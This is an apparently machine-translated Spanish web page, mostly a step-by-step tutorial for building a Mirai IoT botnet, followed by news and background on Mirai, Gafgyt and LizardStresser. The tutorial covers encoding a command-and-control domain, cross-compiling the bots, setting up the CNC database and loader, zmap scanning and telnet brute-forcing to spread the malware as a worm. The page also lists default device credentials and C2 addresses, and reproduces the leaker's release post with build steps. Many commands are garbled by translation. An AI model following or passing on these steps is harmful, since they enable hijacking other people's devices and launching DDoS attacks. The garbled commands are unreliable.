Necesitaremos dos servidores VPS KVM y un dominio. La virtualización es KVM, esta vez falta OpenVZ.
Tomo los servidores aquí -
Instalaremos la botnet en un servidor y escanearemos los bots en el segundo. (brutal)
IMPORTANTE. Los servidores deben estar basados en Debian 8 y tener al menos 1 GB de RAM.
Cualquier dominio, no importa.
Lo siento, por supuesto, pero no te diré cómo adjuntar un dominio a un VPS. No es difícil, lo descubrirás tú mismo.
Masilla y comencemos.
# apt-obtener actualización -y
# apt-obtener actualización -y
# apt-get install descomprimir gcc golang pantalla de cerca eléctrica sudo git -y
# apt-get install mysql-server -y
# apt-get install mysql-client -y
# apt-get instalar apache2 -y
Al instalar MySQL, necesitará crear una contraseña para acceder a MySQL para el usuario root. Te saldrá una contraseña normal, sin ningún tipo de “qwerty”
Escríbalo en alguna parte, lo necesitaremos nuevamente.
# sudo apt-get install curl git mercurial make binutils bison gcc build-essential -y
#intento< <(curl -s -S -L
Debes estar registrado para ver los enlaces.
)# gvm instala go1.4
# gvm usa go1.4 [--default]
# gvm instala go1.4 -B
# gvm usa go1.4
# exportar GOROOT_BOOTSTRAP=$GOROOT
# gvm instala go1.5
# gvm usa go1.5
# gvm instala go1.8
# gvm usa go1.8
Después de instalar todas las utilidades, descargue las fuentes del bot.
Debes estar registrado para ver los enlaces.
Y subirlo al servidor. Equipo obtener, o simplemente a través del programa WinSCP.
# descomprimir Mirai-Source-Code-master.zip
# cd Mirai-Código-fuente-Master/mirai/tools
# gcc enc.c -o enc
# ./enc cadena *******(escribimos nuestro dominio, que está adjunto al servidor) y pulsamos Enter.
Aqui vera el siguiente texto:
XOR"ing 14 bytes de datos...
\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22
14 - aquí tendrás un número diferente, así que no te preocupes, todo está correcto.
Copiamos todo este texto.
Abrir mediante nano editor o mediante WinSCP archivo tabla.c que esta en la carpeta mirai/bot
Debes ver esto -
Debes estar registrado para ver los enlaces.
Línea agregar_entrada(TABLE_CNC_DOMAIN- cambie todo entre comillas al texto que acaba de copiar. En lugar de " 30 " Escribimos nuestro número, que también acabamos de copiar. Hacemos lo mismo con la línea. agregar_entrada(TABLE_SCAN_CB_DOMAIN
Guarde y cierre el editor.
Abra el archivo con un editor. mirai/cnc/main.go
Vemos esto -
Debes estar registrado para ver los enlaces.
"127.0.0.1" cambiar a "127.0.0.1:3306"
"contraseña" Cambiamos la contraseña que introdujimos anteriormente a nuestro MySQL. "
Guarde el archivo y cierre el editor.
Simplemente copia toda esta basura, no te diré por qué es necesaria.
# mkdir /etc/xcompile
# CD /etc/xcompile
#wget
Debes estar registrado para ver los enlaces.
#wget
Debes estar registrado para ver los enlaces.
#wget
Debes estar registrado para ver los enlaces.
#wget
Debes estar registrado para ver los enlaces.
#wget
Debes estar registrado para ver los enlaces.
#wget
Debes estar registrado para ver los enlaces.
#wget
Debes estar registrado para ver los enlaces.
#wget
Debes estar registrado para ver los enlaces.
#wget
Debes estar registrado para ver los enlaces.
# tar -jxf compilador cruzado-armv4l.tar.bz2
# tar -jxf compilador cruzado-i586.tar.bz2
# tar -jxf compilador cruzado-m68k.tar.bz2
# tar -jxf compilador cruzado-mips.tar.bz2
# tar -jxf compilador cruzado-mipsel.tar.bz2
# tar -jxf compilador cruzado-powerpc.tar.bz2
# tar -jxf compilador cruzado-sh4.tar.bz2
# tar -jxf compilador cruzado-sparc.tar.bz2
# tar -jxf compilador cruzado-armv6l.tar.bz2
#rm*.tar.bz2
# mv compilador cruzado-armv4l armv4l
# mv compilador cruzado-i586 i586
#mv compilador cruzado-m68k m68k
# mv compilador cruzado-mips mips
# mv compilador cruzado-mipsel mipsel
# mv compilador cruzado-powerpc powerpc
# mv compilador cruzado-sh4 sh4
# mv compilador cruzado-sparc sparc
# mv compilador cruzado-armv6l armv6l
# exportar RUTA=$RUTA:/etc/xcompile/armv4l/bin
# exportar RUTA=$RUTA:/etc/xcompile/i586/bin
# exportar RUTA=$RUTA:/etc/xcompile/m68k/bin
# exportar RUTA=$RUTA:/etc/xcompile/mips/bin
# exportar RUTA=$RUTA:/etc/xcompile/mipsel/bin
# exportar RUTA=$RUTA:/etc/xcompile/powerpc/bin
# exportar RUTA=$RUTA:/etc/xcompile/powerpc-440fp/bin
# exportar RUTA=$RUTA:/etc/xcompile/sh4/bin
# exportar RUTA=$RUTA:/etc/xcompile/sparc/bin
# exportar RUTA=$RUTA:/etc/xcompile/armv6l/bin
# exportar RUTA=$RUTA:/usr/local/go/bin
# exportar GOPATH=$HOME/Documentos/ir
# ve a github.com/go-sql-driver/mysql
# ve a github.com/mattn/go-shellwords
# cd Mirai-Código-fuente-master/mirai
# ./build.sh depurar telnet
# ./build.sh lanza telnet
# mv mirai* /var/www/html
# CD /var/www/html
#mkdirbins
#mv*contenedores/
Ahora MySQL.
# mysql -u raíz -p
Aquí se le pedirá una contraseña. Ingrese la contraseña que estableció previamente.
# crear base de datos mirai;
# usa mirai
Ahora copia todo el texto de aquí.
Debes estar registrado para ver los enlaces.
Pégalo y presiona Enter.
Copie el texto de aquí -
Debes estar registrado para ver los enlaces.
En lugar de anna-senpai escriba su nombre de usuario. Cualquier. Lo mismo ocurre con mi increíble contraseña. Necesitaremos estos datos para acceder al panel de control del bot.
Debería ser así - INSERTAR EN LOS VALORES de los usuarios (NULL, "pizdec", "zaebalsjapisatj", 0, 0, 0, 0, -1, 1, 30, "");
Copie, pegue, presione Entrar.
Ahora puedes salir.
Esta casi terminado.
# cd Mirai-Código-fuente-master/mirai/release
# toque el mensaje.txt
# pantalla ./cnc
Debes ver la inscripción. Base de datos MySQL abierta
No cerramos esta sesión, abrimos una nueva.
Debes estar registrado para ver los enlaces.
En lugar de *******, escribe tu dominio y haz clic en Abrir.
Ingrese su nombre de usuario y contraseña, en mi caso es -
zaebalsjapisatj
Todo, estamos en el panel de control del bot.
Ahora necesitamos robots. Aquí todo es sencillo, no se necesitan instalaciones.
Configuremos el cargador.
Se necesita un cargador para poder agregar bots desde archivos de texto. Digamos que hemos creado un montón de dispositivos (enrutadores, cámaras, teléfonos) y para agregarlos al bot, necesitamos un cargador.
También el cargador es un "gusano".
Conéctese a nuestro servidor a través de PuTTY y WinSCP.
Usando WinSCP encontramos el archivo C Principal en carpeta Código-fuente-mirai-master/dlr
Escribimos la IP de nuestro servidor como en la captura de pantalla -
Debes estar registrado para ver los enlaces.
Dejamos las comas, así debe ser. Guardar y cerrar.
Ahora con PyTTY vaya a nuestro servidor y escriba -
# cd Mirai-Código-fuente-master/dlr
#chmod777*
# ./build.sh
# lanzamiento del CD
# mv dlr* ~/Mirai-Source-Code-master/loader/bins
ahora abramos WinSCP y encuentra el archivo C Principal en carpeta Código-fuente-mirai-master/loader/src
Lo cambiamos a nuestra IP como en la captura de pantalla -
Debes estar registrado para ver los enlaces.
Guardar y cerrar.
A través de Masilla -
# ./build.sh
Mediante el uso WinSCP abre el archivo scanListen.go que se puede encontrar en la carpeta Código-fuente-mirai-master/mirai/tools
Cambie la IP de su servidor -
Debes estar registrado para ver los enlaces.
Luego con PyTTY -
# cd Mirai-Código-fuente-master/mirai/tools
# ir a construir scanListen.go
Ahora tenemos un nuevo archivo - escanearEscuchar(sin .ir, Justo escanearEscuchar)
escanearEscuchar necesita ser movido a una carpeta Mirai-Source-Code-master/cargador
solo con ayuda WinSCP ponerlo en una carpeta cargador
Ahora comprobemos si todo funciona.
# ./cargador
Si ve lo que hay en la pantalla, entonces todo está correcto.
Debes estar registrado para ver los enlaces.
Si ocurren errores, escriba al tema, lo ayudaré.
Para descargar bots de la lista, suelte el archivo de texto en la carpeta cargador y escribe el comando -
# lista de gatos.txt | ./cargador
Eso es todo, todos los bots que hayas reclutado estarán contigo y bloquearán los sitios a tus órdenes.
Yo personalmente no he usado este método, encontré una manera más fácil.
Aquí necesitamos un segundo servidor. También en Debian8.
# apt-obtener actualización -y
# apt-obtener actualización -y
# apt-get install python-paramiko -y
# apt-get install zmap -y
zmap lo necesitamos para escanear puertos. El principio de funcionamiento es el mismo que KPortScan, sólo 50 veces más rápido.
Copie todo el código desde aquí -
Debes estar registrado para ver los enlaces.
y guardar como escanear.py
Aquí puede agregar sus contraseñas e inicios de sesión:
Debes estar registrado para ver los enlaces.
Cadena combinación¡no toques!
Aquí debe registrar la IP del servidor en el que se encuentra el bot:
Debes estar registrado para ver los enlaces.
Cambiamos todo y lo guardamos.
Colocamos el archivo scan.py en cualquier lugar de nuestro servidor. En el segundo servidor, que es puramente para escanear, aquel en el que no tocamos el bot.
Necesitamos IP que escanearemos.
#zmap -p22 -o lista.txt -B 100M(puedes escanear otros puertos, yo siempre escaneé 22 o 23)
Todos los resultados estarán en el archivo. lista.txt
Después de recopilar el archivo IP (cuanto más, mejor) lista.txt tíralo al lado del archivo escanear.py y escribe -
# python scan.py lista.txt 500
Eso es todo, nos sentamos y observamos cómo crece nuestra botnet.
Cuando haya al menos 200 bots, puedes iniciar el cargador.
Para hacer esto, vaya al servidor donde está instalada la botnet y -
# cd Mirai-Código-fuente-master/loader
# ulimit -n 9999999
# ./scanListen | ./cargador
Ahora el bot funcionará como un "gusano" y acabará con más bots.
Las dos botnets de IoT más famosas y extendidas, Mirai y Gafgyt, siguen multiplicándose. Se han descubierto nuevas variantes de este malware dirigidas al sector empresarial. El principal peligro de estas ciberamenazas reside en ataques DDoS bien organizados y bastante potentes.
La razón de la prevalencia de estos dos programas maliciosos reside en el código fuente filtrado, que estuvo a disposición del público hace varios años. Los ciberdelincuentes novatos inmediatamente comenzaron a inventar sus programas maliciosos basados en él.
En la mayoría de los casos, debido a la incompetencia de los atacantes, los clones de Mirai y Gafgyt no representaron ningún proyecto serio y no introdujeron cambios significativos en sus capacidades.
Sin embargo, variantes recientes de botnets han mostrado una tendencia a infectar dispositivos corporativos. Un informe de Unit 42, un equipo de Palo Alto Networks, afirma que las nuevas muestras de Mirai y Gafgyt han agregado una serie de nuevos exploits a su arsenal que aprovechan vulnerabilidades antiguas.
Mirai ahora ataca sistemas que ejecutan Apache Struts sin parches (así fue como fue pirateado el año pasado). El parche para la falla CVE-2017-5638 existe desde hace más de un año, pero, naturalmente, no todos han actualizado su configuración.
En total, Mirai tiene actualmente 16 exploits, la mayoría de los cuales están diseñados para comprometer dispositivos como enrutadores, grabadoras de vídeo en red y varias cámaras.
Gafgyt (también conocido como Baslite) también ataca equipos comerciales, apuntando a la vulnerabilidad CVE-2018-9866 descubierta recientemente. Esta falla de seguridad crítica afecta a las versiones no compatibles del Sistema de Gestión Global (GMS) de SonicWall. Los investigadores de la Unidad 42 registraron nuevas muestras el 5 de agosto, menos de una semana después de que se publicara el módulo Metasploit para esta vulnerabilidad.
Los dispositivos afectados por Gafgyt pueden escanear otros equipos en busca de varios tipos de problemas de seguridad, así como atacarlos con exploits conocidos. Otro tipo de ataque que puede realizar este malware es Blacknurse, que es un ataque ICMP que afecta en gran medida la carga de la CPU, provocando una denegación de servicio.
Los expertos también descubrieron que estas dos nuevas variantes de botnet estaban alojadas en el mismo dominio. Esto demuestra que detrás de ellos está el mismo ciberdelincuente o su grupo.
A finales del mes pasado informamos de ello. Estos datos se proporcionan en el informe del Índice de Amenaza Global de julio de 2018.
Y ya este mes, los agentes del orden revelaron la identidad detrás de uno de los receptores Mirai más famosos: Satori. Resultó que el ciberdelincuente se enfrenta actualmente a cargos.
La semana pasada se filtró en Internet el código fuente de los componentes de la botnet Mirai, utilizada en ataques DDoS sin precedentes con una capacidad de hasta 1 Tb/s.
Arte. 273 del Código Penal de la Federación de Rusia. Creación, uso y distribución de programas informáticos maliciosos.
1. Creación, distribución o uso de programas informáticos u otra información informática, destinados conscientemente a la destrucción, bloqueo, modificación, copia no autorizados de información informática o neutralización de medios de protección de información informática, -
será castigado con restricción de libertad por un período de hasta cuatro años, o trabajo forzoso por un período de hasta cuatro años, o prisión por el mismo período con multa de hasta doscientos mil rublos o en el importe del salario u otros ingresos del condenado por un período de hasta dieciocho meses.
2. Los actos previstos en el inciso uno de este artículo, cometidos por un grupo de personas mediante conspiración previa o por un grupo organizado o por una persona en uso de su cargo oficial, así como los que hayan causado daño importante o hayan sido cometidos por interés egoísta. , -
será castigado con restricción de libertad por un período de hasta cuatro años, o trabajo forzoso por un período de hasta cinco años con privación del derecho a ocupar determinados cargos o realizar determinadas actividades por un período de hasta tres años o sin él, o pena de prisión de hasta cinco años con multa de cien mil a doscientos mil rublos o por el importe del salario u otros ingresos del condenado por un período de dos a tres años o sin él, y con o sin privación del derecho a ocupar determinados cargos o realizar determinadas actividades por un período de hasta tres años.
3. Los actos previstos en las partes uno o dos de este artículo, si entrañaron consecuencias graves o crearon una amenaza de ocurrencia, -
será castigado con pena privativa de libertad de hasta siete años.
Esta botnet se compone principalmente de cámaras, dispositivos DVR, etc.
La infección se produce de forma muy sencilla: se analiza Internet en busca de puertos 80/23 (web/telnet) abiertos y se seleccionan cuentas codificadas.
Pocos usuarios cambian las contraseñas de sus cuentas integradas (si es posible), por lo que la botnet se repone constantemente con nuevos dispositivos. Si puede cambiar la contraseña de la interfaz web mientras está en ella, entonces la contraseña y la presencia misma de acceso telnet simplemente eluden a muchos usuarios.
Las cuentas más utilizadas son:
habilitar: sistema
cáscara: sh
administrador: administrador
raíz:xc3511
raíz:vizxv
raíz: administrador
raíz:xmhdipc
raíz: 123456
raíz: 888888
soporte soporte
raíz: 54321
raíz: juantech
raíz:anko
raíz: 12345
administración:
raíz:predeterminado
clave de administrador
raíz: raíz
raíz:
usuario:usuario
administrador: smcadmin
raíz: pasar
administrador:admin1234
raíz: 1111
invitado: 12345
raíz: 1234
raíz:contraseña
raíz: 666666
administrador:1111
servicio:servicio
sistema raíz
supervisor:supervisor
raíz:klv1234
administrador:1234
raíz:ikwb
raíz:Zte521
Después de obtener acceso, el centro de comando recibe una notificación binaria sobre la presencia de un nuevo bot:
4a 9a d1 d1 = XXX.XXX.XXX.XXX (la dirección del host estaba aquí)
05 = Pestaña
17 = 23 (Puerto 23 Telnet)
05 = Pestaña
61 64 6d 69 6e = nombre de usuario:admin administrador
05= Pestaña
61 64 6d 69 6e = contraseña de usuario: admin
Los componentes de la botnet están diseñados para funcionar en diferentes entornos, como lo demuestran los ejemplos identificados:
mirai.brazo
mirai.arm7
mirai.mips
mirai.ppc
mirai.sh4
Los servidores de comando se encuentran actualmente en las siguientes direcciones:
103.1.210.27
103.1.210.28
185.130.225.65
185.130.225.66
185.130.225.83
185.130.225.90
185.130.225.94
185.130.225.95
185.70.105.161
185.70.105.164
185.93.185.11
185.93.185.12
200.170.143.5
46.249.38.145
46.249.38.146
46.249.38.148
46.249.38.149
46.249.38.150
46.249.38.151
46.249.38.152
46.249.38.153
46.249.38.154
46.249.38.155
46.249.38.159
46.249.38.160
46.249.38.161
80.87.205.10
80.87.205.11
Las instrucciones para crear una botnet son bastante simples, aquí están tal como están (fuente http://pastebin.com/E90i6yBB):
Hola a todos,
Cuando entré por primera vez en la industria DDoS, no planeaba permanecer en ella por mucho tiempo. Gané mi dinero, hay muchos ojos mirando a IOT ahora, así que es hora de GTFO. Sin embargo, conozco cada patinazo y su mamá, su sueño húmedo es tener algo además de qbot.
Así que hoy tengo un lanzamiento increíble para ustedes. Con Mirai, normalmente extraigo un máximo de 380.000 bots solo desde telnet. Sin embargo, después del DDoS de Kreb, los ISP fueron cerrando lentamente y limpiando sus actividades. Hoy en día, la atracción máxima es de unos 300.000 bots y está disminuyendo.
Entonces, soy tu senpai y te trataré muy bien, mi hf-chan.
Y para todos los que pensaron que estaban haciendo algo al presionar mi CNC, me reí mucho, este robot usa un dominio para CNC. Todos los bots tardan 60 segundos en volver a conectarse, jajaja
Además, agradezca esta publicación de blog de malwaremustdie
http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html
https://web.archive.org/web/20160930230210/http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html<- backup in case low quality reverse engineer unixfreaxjp decides to edit his posts lol
Te tenía mucho respeto, pensé que eras un buen inversor, pero en realidad fracasaste total y totalmente en revertir este binario. "Todavía tenemos mejor kung fu que ustedes, niños", no me hagan reír, por favor, cometieron muchos errores e incluso confundieron algunos binarios diferentes con los míos. JAJAJA
Déjame devolverte algunas bofetadas.
1) el puerto 48101 no es para conexión posterior, es para control para evitar que varias instancias de bot se ejecuten juntas
2) /dev/watchdog y /dev/misc no son para "realizar el retraso", sino para evitar que el sistema se cuelgue. Esta es una fruta madura, es muy triste que seas extremadamente tonto.
3) Fallaste y pensaste que FAKE_CNC_ADDR y FAKE_CNC_PORT eran CNC reales, jajaja "Y haciendo la puerta trasera para conectarte a través de HTTP en 65.222.202.53". te tropezó con el flujo de señal;) esfuérzate más en patinar
4) Su herramienta esquelética apesta, pensó que el decodificador de ataque era “estilo sinden”, pero ¿ni siquiera utiliza un protocolo basado en texto? CNC y bot se comunican a través de protocolo binario
5) dices "chroot("/") tan predecible como torlus pero no lo entiendes, algunos otros matan basándose en cwd. Muestra lo alejado que estás del malware real. volver a skidland
¿Por qué estás escribiendo herramientas de ingeniería inversa? En primer lugar, ni siquiera puedes invertir correctamente. Primero aprenda algunas habilidades antes de intentar impresionar a los demás. Tu arrogancia al declarar cómo “me venciste” con tu tonta declaración de kung-fu me hizo reír tanto mientras comía que mi SO tuvo que darme una palmadita en la espalda.
Así como yo seré libre para siempre, tú estarás condenado a la mediocracia para siempre.
Requisitos
2 servidores: 1 para CNC + mysql, 1 para receptor de escaneo y 1+ para carga
Requisitos del OP
2 VPS y 4 servidores
— 1 VPS con host extremadamente resistente para servidor de base de datos
— 1 VPS, rootkitted, para scanReceiver y distribuidor
— 1 servidor para CNC (usado como 2% de CPU con 400k bots)
— 3 servidores NForce de 10 gbps para carga (el distribuidor distribuye a 3 servidores por igual)
— Para establecer una conexión con el CNC, los robots resuelven un dominio (resolv.c/resolv.h) y se conectan a esa dirección IP
— Los bots utilizan telnet bruto utilizando un escáner SYN avanzado que es aproximadamente 80 veces más rápido que el de qbot y utiliza casi 20 veces menos recursos. Al encontrar un resultado bruto, el bot resuelve otro dominio y lo reporta. Esto está encadenado a un servidor separado para cargar automáticamente en los dispositivos a medida que llegan los resultados.
— Los resultados brutos se envían de forma predeterminada en el puerto 48101. La utilidad llamada scanListen.go en las herramientas se utiliza para recibir resultados brutos (obtuve alrededor de 500 resultados brutos por segundo en el pico). Si compila en modo de depuración, debería ver aparecer la utilidad scanListen binario en la carpeta de depuración.
Mirai utiliza un mecanismo de difusión similar a la autorrepresentación, pero lo que yo llamo "carga en tiempo real". Básicamente, los bots obtienen resultados brutos, los envían a un servidor que escucha con la utilidad scanListen, que envía los resultados al cargador. Este bucle (bruto -> scanListen -> cargar -> bruto) se conoce como carga en tiempo real.
El cargador se puede configurar para usar varias direcciones IP para evitar el agotamiento de los puertos en Linux (hay un número limitado de puertos disponibles, lo que significa que no hay suficiente variación en la tupla para obtener más de 65 000 conexiones salientes simultáneas; en teoría, este valor es mucho). menos). Tendría quizás entre 60.000 y 70.000 conexiones salientes simultáneas (carga simultánea) distribuidas en 5 IP.
El bot tiene varias opciones de configuración que están ofuscadas en (table.c/table.h). En ./mirai/bot/table.h puede encontrar la mayoría de las descripciones de las opciones de configuración. Sin embargo, en ./mirai/bot/table.c hay algunas opciones que *necesitas* cambiar para comenzar a trabajar.
— TABLE_CNC_DOMAIN — Nombre de dominio del CNC al que conectarme — Evitar DDoS es muy divertido con mirai, la gente intenta acceder a mi CNC pero lo actualizo más rápido de lo que pueden encontrar nuevas IP, jajaja. Retrasados :)
— TABLE_CNC_PORT — Puerto al que conectarse, ya está configurado en 23
— TABLE_SCAN_CB_DOMAIN — Cuando se encuentran resultados brutos, se informa a este dominio
— TABLE_SCAN_CB_PORT: puerto al que conectarse para obtener resultados brutos; ya está configurado en 48101.
En ./mirai/tools encontrará algo llamado enc.c. Debe compilar esto para generar elementos que colocar en el archivo table.c.
Ejecutar dentro de este directorio mirai
./build.sh depurar telnet
Recibirá algunos errores relacionados con la falta de compiladores cruzados si no los ha configurado. Esto está bien, no afectará la compilación de la herramienta enc.
Ahora, en la carpeta ./mirai/debug deberías ver un binario compilado llamado enc. Por ejemplo, para obtener una cadena ofuscada para el nombre de dominio al que se pueden conectar los bots, use esto:
./debug/enc cadena joder.the.police.com
La salida debería verse así
XOR haciendo 20 bytes de datos...
\x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E\x4B\x41\x47\x0C\x41\x4D\x4F\x22
Para actualizar el valor TABLE_CNC_DOMAIN, por ejemplo, reemplace esa larga cadena hexadecimal con la proporcionada por la herramienta enc. Además, verá "XORing 20 bytes de datos". Este valor también debe reemplazar el último argumento. Entonces, por ejemplo, la línea table.c originalmente se ve así
add_entry(TABLE_CNC_DOMAIN, "\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22", 30); //cnc.changeme.com
Ahora que conocemos el valor de la herramienta enc, la actualizamos así
add_entry(TABLE_CNC_DOMAIN, "\x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E\x4B\x41\x47\x0C\x41\x4D\x4F\x22″, 20); //joder.la.policia.com
Algunos valores son cadenas, otros son puertos (uint16 en orden de red/big endian).
CONFIGURAR EL CNC:
apt-get instalar servidor-mysql cliente-mysql
El CNC requiere una base de datos para funcionar. Cuando instale la base de datos, acceda a ella y ejecute los siguientes comandos:
http://pastebin.com/86d0iL9g
Esto creará una base de datos para usted. Para agregar su usuario,
INSERTAR EN LOS VALORES de los usuarios (NULL, 'anna-senpai', 'myawesomepassword', 0, 0, 0, 0, -1, 1, 30, ");
Ahora, vaya al archivo ./mirai/cnc/main.go
Editar estos valores
cadena const DatabaseAddr = "127.0.0.1"
const Cadena de usuario de base de datos = "raíz"
const DatabasePass cadena = "contraseña"
const DatabaseTable cadena = "mirai"
A la información del servidor mysql que acaba de instalar
Los compiladores cruzados son fáciles; siga las instrucciones de este enlace para configurarlos. Debe reiniciar su sistema o recargar el archivo .bashrc para que estos cambios surtan efecto.
http://pastebin.com/1rRCc3aD
El CNC, el bot y las herramientas relacionadas:
http://dopefile.pk/a9f2n9ewk8om
Cómo construir bot + CNC
En la carpeta mirai, hay el script build.sh.
./build.sh depurar telnet
Generará archivos binarios de depuración del bot que no se demonizarán e imprimirá información sobre si puede conectarse al CNC, etc., estado de las inundaciones, etc. Se compila en la carpeta ./mirai/debug
./build.sh lanza telnet
Generará binarios de bot listos para producción que son extremadamente sencillos y pequeños (alrededor de 60 KB) que deben cargarse en los dispositivos. Compila todos los archivos binarios en formato: “mirai.$ARCH” en la carpeta ./mirai/release
El cargador lee las entradas de telnet de STDIN en el siguiente formato:
ip:puerto usuario:contraseña
Detecta si hay wget o tftp e intenta descargar el binario usando eso. De lo contrario, cargará un pequeño binario (aproximadamente 1 kb) que será suficiente como wget.
./build.sh
Construirá el cargador, optimizado, uso en producción, sin problemas. Si tiene un archivo en los formatos utilizados para cargar, puede hacer esto
archivo gato.txt | ./cargador
¡Recuerda limitar!
Para que quede claro, no proporcionaré ningún tipo de tutoriales de ayuda personalizados ni nada parecido, es demasiado tiempo. Se incluyen todos los scripts y todo lo necesario para configurar una botnet que funcione en menos de 1 hora. Estoy dispuesto a ayudar si tiene preguntas individuales (¿cómo es que el CNC no se conecta a la base de datos? Hice esto, bla, bla), pero no preguntas como "Mi bot no se conecta, arréglelo".
En esencia, Mirai funciona de manera simple: escanea Internet en busca de dispositivos IoT accesibles a través de telnet que sean vulnerables a la fuerza bruta y la piratería. El malware ataca principalmente a cámaras de vigilancia, DVR y enrutadores, y luego continúa multiplicándose como un gusano.
De los ataques DDoS llevados a cabo por esta botnet recientemente y la más grande de Europa. La potencia máxima de ataque alcanzó los 620 Gbit/s y más de 1 Tb/s. Para lograr estos resultados, los atacantes utilizaron inundaciones UDP, DNS y HTTP, así como paquetes GRE (Generic Routing Encapsulation), que los expertos consideraron muy inusuales.
Las conclusiones de los especialistas de MalwareTech coinciden en general con estas observaciones. Así, durante un período de doce horas, los investigadores registraron alrededor de 72.000 direcciones IP únicas y aparecían 4.000 nuevas IP cada hora. A partir de esto, los analistas concluyeron que el tamaño de la botnet es muy modesto: sólo unos 120.000 dispositivos por día. Y aunque la botnet es mucho más grande y las cifras rondan entre 1 y 1,5 millones de bots, ni los investigadores de MalwareTech ni los especialistas de Akamai están de acuerdo con esto.
"Mirai, que anteriormente era en gran medida ignorado debido a la simplicidad de los ataques de Telnet, se convirtió la semana pasada en un importante tema de discusión en los medios de todo el mundo, y las agencias de aplicación de la ley iniciaron investigaciones, con el apoyo de muchas empresas internacionales", escriben los investigadores. . “Es muy probable que los potentes ataques DDoS se conviertan ahora en una práctica más común a medida que los piratas informáticos encuentren dispositivos IoT cada vez más vulnerables o comiencen a infectar dispositivos protegidos por NAT. Definitivamente es hora de que los fabricantes dejen de lanzar dispositivos con contraseñas globales de forma predeterminada y pasen a lanzar dispositivos con contraseñas generadas aleatoriamente en la parte inferior de la carcasa".
Además del informe, los investigadores de MalwareTech han incluido un vídeo que muestra un mapa de infecciones de Mirai (ver más abajo). También en el sitio web de los investigadores se puede encontrar un mapa interactivo de la botnet, que se actualiza en tiempo real.
Los ataques de la botnet Mirai al proveedor estadounidense de DNS Dyn en 2016 causaron una gran resonancia y atrajeron una mayor atención sobre las botnets. Sin embargo, en comparación con la forma en que los ciberdelincuentes modernos utilizan las botnets hoy en día, los ataques a Dyn pueden parecer bromas infantiles. Los delincuentes han aprendido rápidamente a utilizar botnets para lanzar malware sofisticado que puede crear infraestructuras enteras de computadoras infectadas y otros dispositivos con acceso a Internet para generar ganancias ilícitas a escala masiva.
En los últimos años, los organismos encargados de hacer cumplir la ley han logrado algunos avances en la lucha contra la actividad delictiva asociada con el uso de botnets, pero estos esfuerzos, por supuesto, no son suficientes para crear un agujero suficiente en las botnets operadas por los ciberdelincuentes. A continuación se muestran algunos ejemplos famosos:
Las botnets son redes informáticas que constan de un gran número de ordenadores u otros dispositivos conectados a Internet, en los que, sin el conocimiento de sus propietarios, se descarga y ejecuta software autónomo (bots). Curiosamente, los propios bots se desarrollaron originalmente como herramientas de software para automatizar tareas repetitivas y no delictivas. Irónicamente, uno de los primeros bots exitosos, conocido como Eggdrop, creado en 1993, fue diseñado para administrar y proteger los canales IRC (Internet Relay Chat) de intentos de terceros de tomar el control de ellos. Pero los elementos criminales aprendieron rápidamente a aprovechar el poder de las botnets, usándolas como sistemas globales, virtualmente automatizados y generadores de ganancias.
Durante este tiempo, el malware botnet se ha desarrollado significativamente y ahora puede utilizar varios métodos de ataque que ocurren simultáneamente en varias direcciones. Además, la “economía bot” parece extremadamente atractiva desde el punto de vista de los ciberdelincuentes. En primer lugar, prácticamente no hay costos de infraestructura, ya que para organizar una red de máquinas infectadas se utilizan computadoras comprometidas y otros equipos con acceso a Internet, naturalmente, sin el conocimiento de los propietarios de estos dispositivos. Esta libertad de inversión en infraestructura significa que las ganancias de los delincuentes serán efectivamente iguales a sus ingresos de actividades ilegales. Además de la posibilidad de utilizar una infraestructura tan "rentable", el anonimato también es extremadamente importante para los ciberdelincuentes. Para ello, utilizan principalmente criptomonedas “irrastreables” como Bitcoin cuando exigen un rescate. Por estas razones, las botnets se han convertido en la plataforma preferida para los delitos cibernéticos.
Desde el punto de vista de la implementación de varios modelos de negocio, las botnets son una excelente plataforma para lanzar diversas funciones maliciosas que generan ingresos ilegales a los ciberdelincuentes:
Un factor importante que contribuye a la popularidad de las botnets entre los ciberdelincuentes actuales es la relativa facilidad con la que se pueden ensamblar, intercambiar y mejorar los diversos componentes del malware de botnets. La oportunidad de crear rápidamente una botnet apareció en 2015, cuando los códigos fuente de LizardStresser, una herramienta para realizar ataques DDoS creada por el famoso grupo de hackers Lizard Squad, se hicieron públicos. Hoy en día, cualquier escolar puede descargar una botnet para llevar a cabo ataques DDOS (lo que ya están haciendo, como escriben las publicaciones de noticias de todo el mundo).
Fácilmente descargable y fácil de usar, el código LizardStresser contiene algunos métodos sofisticados para realizar ataques DDoS: mantener abiertas las conexiones TCP, enviar cadenas aleatorias con caracteres basura a un puerto TCP o UDP, o reenviar paquetes TCP con valores de bandera específicos. El malware también incluía un mecanismo para ejecutar comandos de shell aleatoriamente, lo cual es extremadamente útil para descargar versiones actualizadas de LizardStresser con nuevos comandos y una lista actualizada de dispositivos controlados, así como para instalar otro software malicioso en el dispositivo infectado. Desde entonces, se han publicado los códigos fuente de otros programas maliciosos diseñados para organizar y controlar botnets, incluido, en particular, el software Mirai, que ha reducido drásticamente la "barrera de alta tecnología" para iniciar actividades delictivas y, al mismo tiempo, mayores oportunidades de ganancias y flexibilidad en el uso de botnets.
En términos de la cantidad de dispositivos infectados y el tráfico que generan durante los ataques, el uso masivo de dispositivos IoT desprotegidos tuvo un efecto explosivo, dando lugar a la aparición de botnets de una escala sin precedentes. Por ejemplo, en el verano de 2016, antes e inmediatamente durante los Juegos Olímpicos de Río de Janeiro, una de las botnets creada a partir del código del programa LizardStresser utilizó principalmente alrededor de 10 mil dispositivos IoT infectados (principalmente cámaras web) para llevar a cabo múltiples y duraderos ataques DDoS con una capacidad sostenida de más de 400 Gbit/s, alcanzando un valor de 540 Gbit/s durante su pico. También observamos que, según las estimaciones, la botnet Mirai original pudo comprometer alrededor de 500 mil dispositivos IoT en todo el mundo.
